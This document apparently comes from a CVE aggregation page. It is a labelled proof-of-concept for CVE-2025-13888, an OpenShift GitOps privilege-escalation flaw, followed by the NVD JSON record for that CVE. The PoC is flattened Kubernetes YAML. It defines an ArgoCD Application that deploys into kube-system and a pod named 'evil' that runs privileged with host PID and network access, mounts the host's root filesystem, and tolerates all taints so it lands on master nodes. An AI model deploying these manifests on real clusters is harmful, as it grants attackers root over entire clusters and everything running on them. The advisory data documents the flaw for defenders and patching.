CVE-2025-13888

# CVE-2025-13888 PoC - Malicious ArgoCD Application to Escalate Privileges apiVersion: argoproj.io/v1alpha1 kind: Application metadata: name: malicious-app namespace: attacker-namespace spec: project: default source: repoURL: 'https://git.example.com/malicious-repo.git' targetRevision: HEAD path: malicious-payload destination: server: 'https://kubernetes.default.svc' namespace: kube-system # Target privileged namespace --- # Malicious Pod definition that will be deployed apiVersion: v1 kind: Pod metadata: name: privileged-pod namespace: kube-system spec: hostPID: true hostNetwork: true containers: - name: evil image: ubuntu:latest securityContext: privileged: true volumeMounts: - name: host-root mountPath: /host volumes: - name: host-root hostPath: path: / tolerations: - operator: Exists

{"cve": {"id": "CVE-2025-13888", "sourceIdentifier": "[email protected]", "published": "2025-12-15T16:15:50.333", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in OpenShift GitOps. Namespace admins can create ArgoCD Custom Resources (CRs) that trick the system into granting them elevated permissions in other namespaces, including privileged namespaces. An authenticated attacker can then use these elevated permissions to create privileged workloads that run on master nodes, effectively giving them root access to the entire cluster."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:23203", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23206", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23207", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:1017", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-13888", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418361", "source": "[email protected]"}, {"url": "https://github.com/redhat-developer/gitops-operator/commit/bc6ac3e03d7c8b3db5d8f1770c868396a4c2dcef", "source": "[email protected]"}, {"url": "https://github.com/redhat-developer/gitops-operator/pull/897", "source": "[email protected]"}, {"url": "https://github.com/redhat-developer/gitops-operator/releases/tag/v1.16.2", "source": "[email protected]"}]}}